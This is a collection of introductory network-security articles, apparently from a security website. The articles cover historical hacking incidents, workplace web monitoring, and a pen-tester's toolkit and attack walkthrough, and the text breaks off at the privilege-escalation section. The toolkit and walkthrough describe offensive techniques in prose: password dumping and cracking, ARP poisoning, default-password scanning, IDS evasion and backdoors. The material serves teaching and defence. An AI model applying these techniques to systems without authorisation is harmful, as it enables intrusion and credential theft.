In around 15 minutes of monitoring attacks, we saw more than 5000 different origins launching attacks to over 5800 targets, of which 99% of the targets are located in the United States and 50% of the attack origins were from China.

The sad truth is that the majority of these attacks are initiated from compromised computer systems & servers, with unrestricted web access. All it takes today is for one system to visit an infected site and that could be enough to bring down the whole enterprise network infrastructure while at the same time launch a massive attack against Internet targets.

security-protect-enterprise-smb-network-web-monitoring-p1-3In June 2014, Evernote and Feedly, working largely in tandem, went down with a DDoS attack within two days of each other. Evernote recovered the same day, but Feedly had to suffer more. Although there were two more DDoS attacks on Feedly that caused it to lose business for another two days, normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the demands of ransom in exchange for ending the attack and were successful in neutralizing the threat.

security-protect-enterprise-smb-network-web-monitoring-p1-4Domino's Pizza had over 600,000 Belgian and French customer records stolen by the hacking group Rex Mundi. The attackers demanded $40,000 from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands. However, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they however, were unsuccessful in stealing their financial and banking information. The Twitter account of the hacking group was suspended, and they never released the information.

Apart from external attacks, misbehavior from employees can cause equal if not greater damage. Employees viewing pornographic material in the workspace can lead to a huge number of issues. Not only is porn one of the biggest time wasters, it chokes up the network bandwidth with non-productive downloads, including bringing in unwanted virus, malware and Trojans. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable and this may further lead to charges of sexual harassment, dismissal and lawsuits, all expensive and disruptive.

Another major problem is data leakage via e-mail or webmailintended or by accident. Client data, unreleased financial data and confidential plans leaked through emails may cause devastating impact to the business including loss of client confidence.

Web monitoring provides answers to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.

Few Of The Biggest Web Problems

To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:

  • Torrents And Peer-To-Peer Networks offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth causing disruptions in operation such as for video conferencing and VoIP. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of virus and Trojans.
  • Gaming sites are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Most of the games carry lethal payloads of virus and other malware, with hackers finding them a common way for SEO poisoning. Even when safe, games disrupt productivity and clog the network.
  • Fun sites, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether your policies allow such humor sites, they can contain SEO poisoned links and Trojans, often clogging networks with their video components.
  • Online Shopping may relate to purchase of work-appropriate items as well as personal. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit the access to certain hours of the day or block these sites altogether.
  • Non-Productive Surfing can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.

According to a survey involving over 3,000 employees, Salary.com found over 60% involved in visiting sites unrelated to their work every day. More than 20% spent above five hours a week on non-work related sites. Nearly half of those surveyed looked for a new job using office computers in their work time.

In the next part of our article, we will examine the importance of placing a company security policy to help avoid users visiting sites they shouldn't, stop waisting valuable time and resources on activities that can compromise the enterprise's network security and more. We also take an in-depth look on how to effectively monitor and control traffic activity on the Web in real-time, plus much more.

 

  • Hits: 16744

The Most Dangerous Websites On The Internet & How To Effectively Protect Your Enterprise From Them

whitepaper-malicious-website-contentCompanies and users around the world are struggling to keep their network environments safe from malicious attacks and hijacking attempts by leveraging services provided by high-end firewalls, Intrusion Detection Systems (IDS), antivirus software and other means.   While these appliances can mitigate attacks and hacking attempts, we often see the whole security infrastructure failing because of attacks initiated from the inside, effectively by-passing all protection offered by these systems.

I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example is when users find a link while browsing the Internet they tend to click on it to see where it goes even if the context suggests that the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.

The implications of following links with malicious content can vary for each company, however, we outline a few common cases often seen or read about:

  • Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)
  • The company’s servers are overloaded by thousands of requests made from the infected workstation(s)
  • Sensitive information is pulled from the workstations and sent to the hackers
  • Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions
  • Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop
  • Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays

As you can see there are countless examples we can analyze to help us understand how serious the problem can become.

Download this whitepaper if you are interested to:

  • Learn which are the Top 10 Dangerous sites users visit
  • Learn the Pros and Cons of each website category
  • Understand why web content filtering is important
  • Learn how to effectively block sites from compromising your network
  • Learn how to limit the amount of the time users can access websites
  • Effectively protect your network from end-user ‘mistakes’
  • Ensure user web-browsing does not abuse your Internet line or Email servers

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

 

Continue reading

  • Hits: 23866

Download Your Free Whitepaper: How to Secure your Network from Cyber Attacks

whitepaper-fight-cybercrime-moduleCybercriminals are now focusing their attention on small and mid-sized businesses because they are typically easier targets than large, multinational corporations.
This white paper examines the rising security threats that put small and medium businesses at risk. It also highlights important security considerations that SMBs should be aware of.

Download this whitepaper if you’re interested to:

  • Learn on how to adopt best practices and boost your business security.
  • Evaluate the SMB digital footprint.
  • Know what to look for in new security solutions.

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

  • Hits: 17050

A Networked World: New IT Security Challenges

network-security-1This is the age of networks. Long ago, they said, ‘the mainframe is the computer’. Then it changed to ‘the PC is the computer’. That was followed by ‘the network is the computer’. Our world has been shrunk, enlightened and speeded up by this globe encapsulating mesh of interconnectivity. Isolation is a thing of the past. Now my phone brings up my entire music collection residing on my home computer. My car navigates around the city, avoiding traffic in real time. We have started living in intelligent homes where we can control objects within it remotely.

On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?

Tower, Am I Cleared For Landing?

March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground to air communications system went down. This meant that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport. All incoming flights had to be diverted to another airport to avoid a disaster.

This mayhem was caused by a 17 year old hacker named Jester. He had used a normal telephone line and physically tapped into it, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn ended up being part of a high end fire backbone. He was caught when, directed by the United States Security Service, the telephone company traced the data streams back to the hacker’s parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.

As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.

Intruder Alert

April 1994: An US Airforce Base realised that their high level security network was not just hacked, but network-security-2secure documents were stolen. This resulted in an internal cyber man-hunt. The bait was laid and all further intrusions were monitored. A team of 50 Federal Agents finally tracked down 2 hackers who were using US based social networking systems to hack into the Airforce Base. But it was later revealed that the scope of intrusion was not just limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases of ‘datastreamcowboy’ and ‘kuji’.

‘Datastreamcowboy’ was a 16 year old British national who was apprehended on May 4th 1994, and ‘kuji’ was a 21 year old technician named Mathew Bevan from Cardiff, Wales. ‘datastreamcowboy’ was like an apprentice to ‘kuji’. ‘datastreamcowboy’ would try a method of intrusion and, if he failed, he would go back to ‘kuji’ for guidance. ‘kuji’ would mentor him to a point that on subsequent attempts ‘datastreamcowboy’ would succeed.

What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.

But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.

Social Virus

October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcasted the hacker’s messages. The modus operandi of the hacker was to place a virus on his own profile. Whenever someone visited his profile page, he/she would be infected and their profile would show the hacker’s profile message. These new users now being infected would spread the infection through their friends on MySpace, and this created a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.

Creator of this mayhem was Sammy Kamkar, a 19 year old. But his attack was not very well organised as he left digital footprints and was later caught. Banned from using a computer for 3 years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.

What that showed the world was the fact that a cyber attack could come from anywhere, anytime.

In our current digital world we already know that a lot of our complex systems like Air Traffic Control, power stations, dams, etc are controlled and monitored using computers and networks. Let’s try to understand the technology behind it to gauge where the security vulnerabilities come from.

SCADA: Observer & Controller

Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?

SCADA is an acronym for Supervisory Control And Data Acquisition. A quick search on the internet and you would find the definition to be as follows:

SCADA (supervisory control and data acquisition) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:

  • Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.
  • Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.
  • Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.

This effectively lets us control the landing lights on a runway, gates of a reservoir or a dam, connection and disconnection of power grids to a city supply.

Over the last decade all such systems have become connected to the internet. However, when SCADA was being developed no thought was given to security. No one imagined that a SCADA based system would end up on the internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.

Tests have been performed extensively to map the vulnerabilities of a networked SCADA system. A test was done on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased from the open market for a value as low as $2500.

But, thankfully, more and more thought is given today when designing a SCADA based system which will be used over a network. Strict security policies and intrusion detection and avoidance technologies are implemented.

Where’s My Money?

The year 1994 – 1995 saw a momentous change in our financial industry: the entire financial sector was now online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyber space which we use for social networking, shopping etc. As this involved a lot of money, money being transferred in unimaginable amounts, the financial industry, especially banks, went to great lengths to protect themselves.

As happens in our physical world with the advent of better locks thieves change their ways to adapt as well. Hackers have developed tools that can bypass encryptions to steal funds, or even hold an entire institution to ransom. Average annual loss due to cyber heist has been estimated at nearly 1.3 million dollars. Since banks hardly hold any cash in their branches your ordinary bank robbery would hardly amount to $6000 – $8000 in hard cash.

Cyber heist is a criminal industry with staggering rewards. The magnitude is in hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of its long term impact on the compromised institution’s reputation and credibility.

Your Card Is Now My Card!

network-security-credit-card-hacked2005: Miami, Florida. A Miami hacker made history in cyber theft. Alberto Gonzales would drive around Miami streets looking for unsecured wireless networks. He hooked onto the unsecure wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details. By the end of the second year he had stolen about 90 million card details.

He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.

In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.

Meltdown By Swatting

January 2005: A hacker with the alias ‘dshocker’ was carrying out an all out attack on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers. This enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service Attack on the corporation itself. The entire network went into a meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. This false alarm and follow up raids would end up costing the civic authorities vast sums of money and resources.

He was finally arrested when his fraudulent credit card activities caught up with him.

Playing Safe In Today’s World

Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.

We can’t abolish using the network, the cloud or the things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and amenities used by us everyday are not turned against us. This goes for everyone, big organisations and the individual using his home network.

At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged. That is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s email, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.

The simple exercise of keeping your pop-up blocker turned on will keep your surfing through your browser a lot safer. Your operating system, mainly Windows and Linux, lets you keep a guest account so whenever a ‘guest’ wants to check his/her emails or surf the web have them use this account instead of your own. Not that you don’t trust your guest but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has  minimal privileges for users so it can be safe. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank up. That’s safer.

At work, please don’t plug an unauthorised wireless access point into your corporate network, this can severely compromise it. Use strong passwords for accounts, remove old accounts not being used. Incorporate strong firewall rules and demarcate effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy, or disable it. You are using company time for a purpose that can’t be work related. If it is needed, ask the network administrator for assistance.

I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.

Readers can also visit ourNetwork Security section which offers a number of interesting articles covering Network Security.

About the Writer

Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK and works as network designer and innovator for remote management systems, for a major telecoms company in UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.

 

  • Hits: 16016

Introduction To Network Security - Part 2

This article builds upon our first article Introduction to Network Security - Part 1. This article is split into 5 pages and covers a variety of topics including:

  • Tools and Attacker Uses
  • General Network Tools
  • Exploits
  • Port Scanners
  • Network Sniffers
  • Vulnerability Scanners
  • Password Crackers
  • What is Penetration Testing
  • More Tools
  • Common Exploits
  • A Brief Walk-through of an Attack
  • and more.

Tools An Attacker Uses

Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.

Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example I can use a network sniffer to diagnose a low level network problem or I can use it to collect your password. It just depends which shade of hat I choose to wear.

General Network Tools

As surprising as it might sound, some of the most powerful tools especially in the beginning stages of an attack are the regular network tools available with most operating systems. For example and attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high profile targets such as webservers, mailservers, dns servers etc. He might also be able to figure what different systems do based on their dns name -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.

Exploits

An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (eg: a buffer overflow) or it could be a program that takes advantage of a misconfiguration.

A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones that the vendor has not yet released a patch for. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.

Port Scanners

Most of you will know what portscanners are. Any system that offers TCP or UDP services will have an open port for that service. For example if you're serving up webpages, you'll likely have TCP port 80 open, FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.

A portscanner scans a host or a range of hosts to determine what ports are open and what service is running on them. This tells the attacker which systems can be attacked.
For example, if I scan a webserver and find that port 80 is running an old webserver -- IIS/4.0, I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.

This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered and what Operating Systems are in use etc. One of the best portscanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system is very versatile in how it lets you scan a system and has many features including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is Superscan (https://www.foundstone.com) which is only for the windows platform.

Network Sniffers

A network sniffer puts the computers NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is TCPdump as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.

When the target network is a switched environment (a network which uses layer 2 switches), a conventional network scanner will not be of any use. For such cases, the switched network sniffer Ettercap (http://ettercap.sourceforge.net) and WireShark (https://www.wireshark.org) are very popular. Such programs are usually run with other hacking capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure webpages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).

Vulnerability Scanners

A vulnerability scanner is like a portscanner on steroids, once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes are found. The software can be updated to scan for the latest security holes. These tools are very simple to use unfortunately, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well as they can scan their whole network and get a detailed summary of what holes exist.

Password Crackers

Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX like systems this is the /etc/passwd or /etc/shadow file and in Windows it is the SAM database. Once he gets hold of this file, its usually game over, he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night !

There are essentially two methods of password cracking :

Dictionary Mode - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek Gods (yes Chris, that's a shout-out to you ;)) I can find a dictionary list of Greek God names and run it through the password cracker.

Most attackers have a large collection of wordlists. For example when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customized lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding on a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.

Brute Force Mode - In this mode, the password cracker will try every possible combination for the password. In other words it will try aaaaa, aaaab, aaaac, aaaad etc. this method will crack every possible password -- its just a matter of how long it takes. It can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include l0phtcrack for windows passwords and John the Ripper for UNIX style passwords.

For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.


What is Penetration-Testing?

Penetration testing is basically when you hire (or perform yourself) security consultants to attack your network the way an attacker would do it, and report the results to you enumerating what holes were found, and how to fix them. It's basically breaking into your own network to see how others would do it.

While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).

An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.

I find there's a lack of worthwhile information online about penetration testing -- nobody really goes about describing a good pen test, and what you should and shouldn't do. So I've hand picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen-test.

This is by no means the only way to do things, it's like subnetting -- everyone has their own method -- this is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets as well as what level of testing you're allowed to do, this method can be adapted.

Papers Covering Penetration Testing

I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:

'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.

'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)

'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)

'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room

Pen-test Setup

I don't like working from laptops unless its absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com) most linux exploits compile fine under cygwin, if they don't then I shove them into vmware where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesnt work, the system also dual boots Red Hat 9 and often I'll just work everything out from there.

I feel the advantage of using a microsoft platform often comes from the fact that 90% of your targets may be microsoft systems. However the flexibility under linux is incomparable, it is truely the OS of choice for any serious hacker.. and as a result, for any serious security professional. There is no best O/S for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.

If I don't have the option of using my own machine, I like to choose any linux variant.
I keep my pen-tests strictly to the network level, there is no social engineering involved or any real physical access testing other than basic server room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).

I try as far as possible to determine the Rules Of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important because if you do something that ends up causing trouble on the network, its going to make you look very unprofessional. It's always better to have it done clearly in writing -- this is what you are allowed to do.

I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if its against your corporate policy. If you're an outside tester, offer to allow one of their people to be present for your testing if they want. This is recommended as they will ultimately be fixing most of these problems and being in-house people they will be able to put the results of the test in perspective to the managers.

Tools

I start by visiting the target website, running a whois, DNS zone transfer (if possible) and other regular techniques which are used to gather as much network and generic information about the target. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a textfile. Keeping notes is critically important, it's very easy to forget some minor detail that you should include in your end report.

Now for a part of the arsenal -- not in any order and far from the complete list.

Nmap - Mine (and everyone elses) workhorse port scanner with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. When used smartly, Nmap can find any Internet facing host on a network.

Nessus - My favourite free vulnerability scanner, usually finds something on every host. Its not too stealthy though and will show up in logs (this is something I don't have to worry about too much).

Retina - A very good commercial vulnerability scanner, I stopped using this after I started with nessus but its very very quick and good. Plus its vulnerability database is very up-to-date.

Nikto - This is a webserver vulnerability scanner. I use my own hacked up version of this perl program which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.

Cisco Scanner - This is a small little windows util I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past and just goes to show how even small little tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.

Sophie Script - A little perl script coupled with user2sid and sid2user (two windows programs) which can find all the usernames on a windows machine.

Legion - This is a windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and allows you to map the drive right from in the software.

Pwdump2 - Dumps the content of the windows password sam file for loading into a password cracker.

L0phtcrack 3.0 - Cracks the passwords I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via remote registry. I have not tried the latest version of the software, but it is very highly rated.

Netcat - This is a TCP/UDP connection backend tool, oh boy I am lost without this ! Half my scripts rely on it. There is also an encrypted version called cryptcat which might be useful if you are walking around an IDS. Netcat can do anything with a TCP or UDP connection and it serves as my replacement to telnet as well.

Hping2 - A custom packet creation utility, great for testing firewall rules among other things.

SuperScan - This is a windows based port scanner with a lot of nice options. Its fast, and has a lot of other neat little tools like NetBIOS enumeration and common tools such as whois, zone transfers etc.

Ettercap - When sniffing a switched network, a conventional network sniffer will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send packets to you and you can sniff them. It also allows you to inject data into connections and kill connections among other things.

Brutus - This is a fairly generic protocol brute forcing tool. It can bruteforce HTTP, FTP, Telnet and many other login authentication systems. This is a windows tool, however I prefer Hydra for linux.

Bunch of Common Exploits Effeciently Sorted

This is my collection of exploits in source and binary form. I sort them in subdirectories by operating system, then depending on how they attack - Remote / Local and then according to what they attack - BIND / SMTP / HTTP / FTP / SSH etc etc. The binary filenames are arbitrary but the source filenames instantly tell me the name of the exploit and the version of the software vulnerable.

This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits, there is nobody I know who would authorise you to take down a production system. Don't do it -- and tell them you arent doing it.. and only if they plead with you should you do it.

Presenting Reports

This is the critical part -- it's about presenting what you found to people who probably don't understand a word of what your job is about other than you're costing them money. You have to show them that there are some security problems in your network, and this is how serious they might be.

A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to do this, I believe it is important you exploit the system to at least level 1. This is important because there is a very big difference in saying something is vulnerable and actually seeing that the vulnerability is executable. Not to mention when dealing with a corporate type, seeing 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.

After you're done, make a VERY detailed chronological report of everything you did, including which tools you used, what version they are, and anything else you did without using tools (eg. SQL injection). Give gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try and include figures and statistics for whatever you can.

To cater to the admins, provide a report for each host you tested and make sure that for every security hole you point out, you provide a link to a site with a patch or fix, . Try to provide a link to a site with detailed information about the hole preferably bugtraq or some well known source -- many admins are very interested in these things and appreciate it.


A Brief Walk-through of an Attack

This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number will follow the similar methodology or at least the chain of events.

This section assumes that the attacker is moderately skilled and moderately motivated to breaking into your network. He/She has targeted you due to a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-link India are you listening ? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.

Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.

Reconnaissance & Footprinting

Here the attacker will try to gather as much information about your company and network as they can without making a noise. They will first use legitimate channels, such as google and your company webpage to find out as much about you as they can. They will look for the following information:


Technical information is a goldmine, things like a webpage to help your employees log in from home will be priceless information to them. So also will newsgroup postings by your IT department asking how to set up particular software, as they now know that you use this software and perhaps they know of a vulnerability in it.

Personal information about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.

Information about your partners. This might be useful information for them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way in to your network from there.

General news. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.

They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network level scans.
After this they will start a series of network probes. The most basic of which will be to determine if you have a firewall, and what it protects. They will try and identify any systems you have that are accessible from the Internet.

The most important targets will be the ones that provide public services. These will be :

Webservers - usually the front door into the network. All webserver software has some bugs in it, and if you're running home made CGI scripts such as login pages etc, they might be vulnerable to techniques such as SQL injection.

Mail servers - Sendmail is very popular and most versions have at least one serious vulnerability in them. Many IT heads don't like to take down the mail server for maintenance as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail).

DNS servers - Many implementations of BIND are vulnerable to serious attacks. The DNS server can be used as a base for other attacks, such as redirecting users to other websites etc.

Network infrastructure - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled they can be used for anything from a simple Denial of Service attack by messing up their configurations, to channeling all your data through the attackers machine to a sniffer.

Database servers - Many database servers have the default sa account password blank and other common misconfigurations. These are very high profile targets as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.

The more naive of the lot (or the ones who know that security logs are never looked at) may run a commercial vulnerability scanner such as nessus or retina over the network. This will ease their work.

Exploitation Phase

After determining which are valid targets and figuring out what OS and version of software they are using (example which version of Apache or IIS is the web server running), the attacker can look for an exploit targeting that particular version. For example if they find you are running an out of date version of Sendmail, they will look for an exploit targeting that version or below.

They will first look in their collection of exploits because they have tested these. If they cannot find one, they will look to public repositories such as https://www.packetstormsecurity.nl. They will probably try to choose common exploits as these are more likely to work and they can probably test them in their own lab.

From here they have already won half the game as they are behind the firewall and can probably see a lot more of the internal network than you ever intended for them to. Many networks tend to be very hard to penetrate from the outside, but are woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defense will have the full run of your network.

After getting in, they will also probably install backdoors on this first compromised system to provide them with many ways in, in case their original hole gets shut down. This is why when you identify a machine that was broken into, it should be built up again from scratch as there is no way of knowing what kind of backdoors might be installed. It could be tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attackers machine. Once they have successfully guaranteed their access, the harder part of the intrusion is usually over.

Privilege Escalation Phase

